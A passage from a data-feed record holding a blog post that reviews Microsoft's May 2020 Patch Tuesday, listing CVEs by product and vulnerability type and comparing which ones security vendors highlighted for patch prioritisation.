"AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "href": "http://feedproxy.google.com/~r/avleonov/~3/0BOlzDUoVDc/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-20T04:20:58", "description": "This will be my third Microsoft Patch Tuesday report in video and audio format. And for the third time in a row, Microsoft has addressed over a hundred vulnerabilities. With my [Microsoft Patch Tuesday parser](<https://avleonov.com/2020/04/26/microsoft-patch-tuesday-april-2020/#classification-script>), it was possible to generate a report almost on the same day. But, of course, it takes much more time to describe the vulnerabilities manually.\n\n\n\n * All vulnerabilities: 111\n * Critical: 16\n * Important: 95\n * Moderate: 0\n * Low: 0\n\n[Last time](<https://avleonov.com/2020/04/26/microsoft-patch-tuesday-april-2020/>) I complained that different VM vendors release completely different reports for Microsoft Patch Tuesday. This time I decided that it's not a bug, but a feature. I upgraded my script to not only show vulnerabilities, but also show how these vulnerabilities were mentioned in the reports of various VM vendors ([Tenable](<https://www.tenable.com/blog/microsoft-s-may-2020-patch-tuesday-addresses-111-cves>), [Qualys](<https://blog.qualys.com/laws-of-vulnerabilities/2020/05/12/may-2020-patch-tuesday-111-vulns-16-critical-sharepoint-vs-code-adobe-patches>), [Rapid7](<https://blog.rapid7.com/2020/05/12/patch-tuesday-may-2020/>) and [ZDI](<https://www.thezdi.com/blog/2020/5/12/the-may-2020-security-update-review>)). In my opinion, it seems pretty useful.\n\n### Exploitation detected (0)\n\nIn the old report, we can see that there are no vulnerabilities actively used in attacks.\n\n### Exploitation more likely (8)\n\nThere are 8 vulnerabilities that MS considers more likely to be exploited. We see the types of these vulnerabilities and what products they affect. 
But all other details should be googled.\n\n#### Remote Code Execution\n\n * Internet Explorer ([CVE-2020-1062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1062>))\n * Microsoft Graphics Components ([CVE-2020-1153](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1153>))\n * VBScript ([CVE-2020-1035](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1035>), [CVE-2020-1058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1058>), [CVE-2020-1060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1060>))\n\n#### Elevation of Privilege\n\n * Windows Graphics Component ([CVE-2020-1135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1135>))\n * Windows Kernel ([CVE-2020-1054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1054>), [CVE-2020-1143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1143>))\n\nAnd here my script adds comments about vulnerabilities from the vendors and highlights vulnerabilities that were mentioned (or not mentioned).\n\n\n\nWe can see right away that Rapid7 recommends paying attention to the RCE in Internet Explorer (CVE-2020-1062), although other vendors ignore this vulnerability.\n\nAccording to W3Counter, the current IE11 share is only 1.75%. But, on the other hand, it can still be used in some organizations to access legacy systems. And so this vulnerability may be exploited in targeted attacks.\n\nTenable pays attention to the RCE in Microsoft Graphics Components. "The attacker would need to utilize social engineering tactics to convince a user to open a specially crafted file". Finally, ZDI claims that the VBScript RCE (CVE-2020-1060) is especially interesting because it "doesn't involve some form of user interaction".\n\nYou'll agree that looking at Microsoft Patch Tuesday vulnerabilities in this way is much more fun. 

Regarding Elevation of Privilege, ZDI claims that the Windows Graphics Component EoP (CVE-2020-1135) is genuinely exploitable. Tenable mentions vulnerabilities of this type in the Windows Kernel (CVE-2020-1054, CVE-2020-1143).

All of these were "more likely to be exploited" vulnerabilities, according to Microsoft.

### Other Product based (36)

What about the other vulnerabilities? Let's look at the large groups of vulnerabilities in the same product. Strictly speaking, there is only one product, Microsoft SharePoint, with a bunch of different vulnerability types. The rest are EoPs in Windows components that no VM vendor mentions.

#### Microsoft SharePoint

 * Remote Code Execution ([CVE-2020-1023](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1023>), [CVE-2020-1024](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1024>), [CVE-2020-1102](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1102>), [CVE-2020-1069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1069>))
 * Information Disclosure ([CVE-2020-1103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1103>))
 * Cross Site Scripting ([CVE-2020-1099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1099>), [CVE-2020-1100](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1100>), [CVE-2020-1101](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1101>), [CVE-2020-1106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1106>))
 * Spoofing ([CVE-2020-1104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1104>), [CVE-2020-1105](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1105>), [CVE-2020-1107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1107>))

#### Windows Runtime

 * Elevation of Privilege ([CVE-2020-1077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1077>), [CVE-2020-1086](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1086>), [CVE-2020-1090](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1090>), [CVE-2020-1125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1125>), [CVE-2020-1139](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1139>), [CVE-2020-1149](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1149>), [CVE-2020-1151](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1151>), [CVE-2020-1155](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1155>), [CVE-2020-1156](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1156>), [CVE-2020-1157](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1157>), [CVE-2020-1158](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1158>), [CVE-2020-1164](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1164>))

#### Windows State Repository Service

 * Elevation of Privilege ([CVE-2020-1124](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1124>), [CVE-2020-1131](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1131>), [CVE-2020-1134](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1134>), [CVE-2020-1144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1144>), [CVE-2020-1184](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1184>), [CVE-2020-1185](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1185>), [CVE-2020-1186](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1186>), [CVE-2020-1187](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1187>), [CVE-2020-1188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1188>), [CVE-2020-1189](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1189>), [CVE-2020-1190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1190>), [CVE-2020-1191](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1191>))

The vendors do write a lot about SharePoint, especially about the RCEs (CVE-2020-1023, CVE-2020-1024, CVE-2020-1069, CVE-2020-1102). Three of the four RCEs involve uploading a malicious application package to exploit the vulnerability, while the fourth involves uploading a malicious page. In short, if you use SharePoint in your organization, you need to patch again.

### Other Vulnerability Type based (67)

And what about the remaining vulnerabilities in various products? Of course, the RCEs that can be used in phishing attacks are the most interesting. These are the vulnerabilities in Microsoft Color Management (CVE-2020-1117), Edge PDF (CVE-2020-1096) and Excel (CVE-2020-0901).

Vendors paid a lot of attention to the RCEs in the Visual Studio Code Python Extension (CVE-2020-1171, CVE-2020-1192). But IMHO this is just a curious case. It is unlikely that attacks requiring a specially crafted file or a repository with malicious code to be opened in Visual Studio Code will ever be widespread.

It is also worth noting the RCE vulnerability in Windows (CVE-2020-1067). The ZDI guys write that: "the only thing keeping this from being Critical is the fact that the attacker needs a domain user account for their specially crafted request to succeed. This makes the bug a prime target for insider threats, as well as penetration testers looking to expand their foothold in a target enterprise."

#### Remote Code Execution

 * Chakra Scripting Engine ([CVE-2020-1037](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1037>), [CVE-2020-1065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1065>))
 * Internet Explorer ([CVE-2020-1092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1092>))
 * Jet Database Engine ([CVE-2020-1051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1051>), [CVE-2020-1174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1174>), [CVE-2020-1175](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1175>), [CVE-2020-1176](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1176>))
 * MSHTML Engine ([CVE-2020-1064](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1064>))
 * Microsoft Color Management ([CVE-2020-1117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1117>))
 * Microsoft Edge PDF ([CVE-2020-1096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1096>))
 * Microsoft Excel ([CVE-2020-0901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0901>))
 * Microsoft Script Runtime ([CVE-2020-1061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1061>))
 * VBScript ([CVE-2020-1093](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1093>))
 * Visual Studio Code Python Extension ([CVE-2020-1171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1171>), [CVE-2020-1192](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1192>))
 * Windows ([CVE-2020-1067](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1067>))

#### Denial of Service

 * .NET Core & .NET Framework ([CVE-2020-1108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1108>))
 * ASP.NET Core ([CVE-2020-1161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1161>))
 * Connected User Experiences and Telemetry Service ([CVE-2020-1084](<https://portal.msrc.microsoft.com/en-US/security